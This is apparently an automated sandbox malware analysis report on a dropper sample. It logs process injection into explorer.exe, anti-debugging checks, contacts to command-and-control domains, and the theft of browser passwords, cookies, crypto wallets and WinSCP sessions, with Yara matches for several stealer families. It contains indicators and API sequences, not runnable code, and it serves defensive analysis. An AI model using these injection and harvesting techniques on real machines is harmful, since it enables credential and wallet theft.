Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Show sources

Source: C:\Users\user\Desktop\69CDTt1pad.exe	System information queried: CodeIntegrityInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tvvihsf	System information queried: CodeIntegrityInformation			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\CA2F.exe

31_2_00412190

Source: C:\Users\user\Desktop\69CDTt1pad.exe	Code function: 1_2_02F985D3 push dword ptr fs:[00000030h]	1_2_02F985D3
Source: C:\Users\user\AppData\Roaming\tvvihsf	Code function: 21_2_02E30042 push dword ptr fs:[00000030h]	21_2_02E30042
Source: C:\Users\user\AppData\Roaming\tvvihsf	Code function: 21_2_02FE7F7B push dword ptr fs:[00000030h]	21_2_02FE7F7B
Source: C:\Users\user\AppData\Local\Temp\B483.exe	Code function: 27_2_004590DF mov eax, dword ptr fs:[00000030h]	27_2_004590DF
Source: C:\Users\user\AppData\Local\Temp\B483.exe	Code function: 27_2_00459154 mov eax, dword ptr fs:[00000030h]	27_2_00459154
Source: C:\Users\user\AppData\Local\Temp\B483.exe	Code function: 27_2_00459123 mov eax, dword ptr fs:[00000030h]	27_2_00459123

Source: C:\Users\user\Desktop\69CDTt1pad.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tvvihsf	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B483.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B483.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\CA2F.exe

Code function: 31_2_0046E577 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

31_2_0046E577

Source: C:\Users\user\AppData\Local\Temp\CA2F.exe

Code function: 31_2_0047CD97 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

31_2_0047CD97

Source: C:\Users\user\AppData\Local\Temp\C481.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\C481.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\CA2F.exe

Code function: 31_2_0046E577 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

31_2_0046E577

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\explorer.exe	Domain query: readinglistforaugust3.xyz
Source: C:\Windows\explorer.exe	Domain query: readinglistforaugust2.xyz
Source: C:\Windows\System32\svchost.exe	Domain query: mxb-00000d03.gslb.pphosted.com
Source: C:\Windows\explorer.exe	Domain query: readinglistforaugust1.xyz
Source: C:\Windows\System32\svchost.exe	Domain query: hotmail-com.olc.protection.outlook.com

Benign windows process drops PE files

Show sources

Source: C:\Windows\explorer.exe

File created: tvvihsf.5.dr

Jump to dropped file

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\69CDTt1pad.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\69CDTt1pad.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tvvihsf	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tvvihsf	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\AppData\Roaming\tvvihsf

Memory written: C:\Users\user\AppData\Roaming\tvvihsf base: 400000 value starts with: 4D5A

Jump to behavior

Contains functionality to inject code into remote processes

Show sources

Source: C:\Users\user\AppData\Roaming\tvvihsf

Code function: 21_2_02E30110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,

21_2_02E30110

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Users\user\Desktop\69CDTt1pad.exe	Thread created: C:\Windows\explorer.exe EIP: 2FD1EEC			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tvvihsf	Thread created: unknown EIP: 3131EEC			Jump to behavior

Source: C:\Users\user\Desktop\69CDTt1pad.exe	Process created: C:\Users\user\Desktop\69CDTt1pad.exe 'C:\Users\user\Desktop\69CDTt1pad.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tvvihsf	Process created: C:\Users\user\AppData\Roaming\tvvihsf C:\Users\user\AppData\Roaming\tvvihsf	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 492 -ip 492	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 492 -s 752	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Process created: unknown unknown

Source: explorer.exe, 00000005.00000000.301052558.0000000001400000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.518026772.000002310A260000.00000002.00000001.sdmp, B483.exe, 0000001B.00000000.414007455.00000000033D0000.00000002.00000001.sdmp	Binary or memory string: uProgram Manager
Source: explorer.exe, 00000005.00000000.278122201.0000000005F40000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.518026772.000002310A260000.00000002.00000001.sdmp, B483.exe, 0000001B.00000000.414007455.00000000033D0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.301052558.0000000001400000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.518026772.000002310A260000.00000002.00000001.sdmp, B483.exe, 0000001B.00000000.414007455.00000000033D0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.257437669.0000000000EB8000.00000004.00000020.sdmp	Binary or memory string: ProgmanX
Source: explorer.exe, 00000005.00000000.301052558.0000000001400000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.518026772.000002310A260000.00000002.00000001.sdmp, B483.exe, 0000001B.00000000.414007455.00000000033D0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000005.00000000.287587911.0000000008ACF000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWndAj

Source: C:\Users\user\AppData\Local\Temp\B483.exe	Code function: __EH_prolog,CoInitialize,GetUserDefaultLCID,GetLocaleInfoA,Sleep,Sleep,GetUserNameA,Sleep,_strlen,_strlen,CreateThread,CreateThread,CreateThread,CreateThread,StrToIntA,CreateThread,CreateThread,WaitForSingleObject,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,CreateThread,GetModuleHandleA,FreeLibrary,WaitForSingleObject,lstrlenA,lstrlenA,GetEnvironmentVariableA,ShellExecuteA,ShellExecuteA,CoUninitialize,	27_2_0042B4DB
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: __EH_prolog3,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,_memset,LocalFree,	31_2_0045F961
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	31_2_004780AC
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	31_2_0047816C
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	31_2_004781D3
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	31_2_0047820F
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	31_2_0047660B
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	31_2_004768B6
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	31_2_0047CAF9
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	31_2_0047CBD3

Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\C481.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Queries volume information: C:\ProgramData\ZDTM9ZA58FK7BC9692W7CABF3\files\Autofill\Google Chrome_Default.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Queries volume information: C:\ProgramData\ZDTM9ZA58FK7BC9692W7CABF3\files\CC\Google Chrome_Default.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Queries volume information: C:\ProgramData\ZDTM9ZA58FK7BC9692W7CABF3\files\Cookies\Edge_Cookies.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Queries volume information: C:\ProgramData\ZDTM9ZA58FK7BC9692W7CABF3\files\Cookies\Google Chrome_Default.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Queries volume information: C:\ProgramData\ZDTM9ZA58FK7BC9692W7CABF3\files\Cookies\IE_Cookies.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Queries volume information: C:\ProgramData\ZDTM9ZA58FK7BC9692W7CABF3\files\Downloads\Google Chrome_Default.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Queries volume information: C:\ProgramData\ZDTM9ZA58FK7BC9692W7CABF3\files\Files\11111.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Queries volume information: C:\ProgramData\ZDTM9ZA58FK7BC9692W7CABF3\files\History\Google Chrome_Default.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Queries volume information: C:\ProgramData\ZDTM9ZA58FK7BC9692W7CABF3\files\information.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Queries volume information: C:\ProgramData\ZDTM9ZA58FK7BC9692W7CABF3\files\passwords.txt VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\69CDTt1pad.exe

Code function: 1_2_00405A5D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

1_2_00405A5D

Source: C:\Users\user\AppData\Local\Temp\B483.exe

Code function: 27_2_004362A8 __EH_prolog,GetTimeZoneInformation,std::ios_base::_Ios_base_dtor,

27_2_004362A8

Source: C:\Users\user\AppData\Local\Temp\B483.exe

Code function: 27_2_0042B4DB __EH_prolog,CoInitialize,GetUserDefaultLCID,GetLocaleInfoA,Sleep,Sleep,GetUserNameA,Sleep,_strlen,_strlen,CreateThread,CreateThread,CreateThread,CreateThread,StrToIntA,CreateThread,CreateThread,WaitForSingleObject,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,CreateThread,GetModuleHandleA,FreeLibrary,WaitForSingleObject,lstrlenA,lstrlenA,GetEnvironmentVariableA,ShellExecuteA,ShellExecuteA,CoUninitialize,

27_2_0042B4DB

Source: C:\Users\user\AppData\Local\Temp\CA2F.exe

Code function: 31_2_0040E962 _memset,GetVersionExA,

31_2_0040E962

Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)

Show sources

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval

Jump to behavior

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Source: svchost.exe, 0000000F.00000002.513024380.00000227DBB02000.00000004.00000001.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information:

Yara detected RedLine Stealer

Show sources

Source: Yara match

File source: Process Memory Space: C481.exe PID: 3804, type: MEMORYSTR

Yara detected Vidar

Show sources

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected SmokeLoader

Show sources

Source: Yara match	File source: 3.1.69CDTt1pad.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.69CDTt1pad.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.tvvihsf.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.1.tvvihsf.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000002.382323711.00000000005A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.319923484.0000000002061000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.382285678.0000000000580000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.319622428.0000000000460000.00000004.00000001.sdmp, type: MEMORY

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 27.3.B483.exe.4870000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.0.B483.exe.47e0e50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.0.B483.exe.47e0e50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.0.B483.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.3.B483.exe.4870000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.B483.exe.47e0e50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.0.B483.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.0.B483.exe.47e0e50.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.B483.exe.47e0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.0.B483.exe.47e0e50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.B483.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000000.414147261.00000000047E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.520963245.00000000047E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.411422894.00000000047E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.412569574.000000000046C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: B483.exe PID: 492, type: MEMORYSTR

Yara detected Vidar stealer

Show sources

Source: Yara match	File source: 31.2.CA2F.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.CA2F.exe.40b0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.CA2F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.CA2F.exe.40b0e50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.3.CA2F.exe.4150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.3.CA2F.exe.4150000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000002.488756126.00000000026D4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, type: MEMORY

Yara detected Tofsee

Show sources

Source: Yara match	File source: 00000027.00000002.479473335.0000000002E30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000003.438774963.0000000002E50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.471628621.0000000000400000.00000040.00020000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies

Tries to steal Crypto Currency Wallets

Show sources

Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Local\Temp\CA2F.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Remote Access Functionality:

Yara detected RedLine Stealer

Show sources

Source: Yara match

File source: Process Memory Space: C481.exe PID: 3804, type: MEMORYSTR

Yara detected Vidar

Show sources

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected SmokeLoader

Show sources

Source: Yara match	File source: 3.1.69CDTt1pad.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.69CDTt1pad.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.tvvihsf.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.1.tvvihsf.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000002.382323711.00000000005A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.319923484.0000000002061000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.382285678.0000000000580000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.319622428.0000000000460000.00000004.00000001.sdmp, type: MEMORY

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 27.3.B483.exe.4870000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.0.B483.exe.47e0e50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.0.B483.exe.47e0e50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.0.B483.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.3.B483.exe.4870000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.B483.exe.47e0e50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.0.B483.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.0.B483.exe.47e0e50.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.B483.exe.47e0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.0.B483.exe.47e0e50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.B483.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000000.414147261.00000000047E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.520963245.00000000047E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.411422894.00000000047E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.412569574.000000000046C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: B483.exe PID: 492, type: MEMORYSTR

Yara detected Vidar stealer

Show sources

Source: Yara match	File source: 31.2.CA2F.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.CA2F.exe.40b0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.CA2F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.CA2F.exe.40b0e50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.3.CA2F.exe.4150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.3.CA2F.exe.4150000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000002.488756126.00000000026D4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, type: MEMORY

Yara detected Tofsee

Show sources

Source: Yara match	File source: 00000027.00000002.479473335.0000000002E30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000003.438774963.0000000002E50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.471628621.0000000000400000.00000040.00020000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
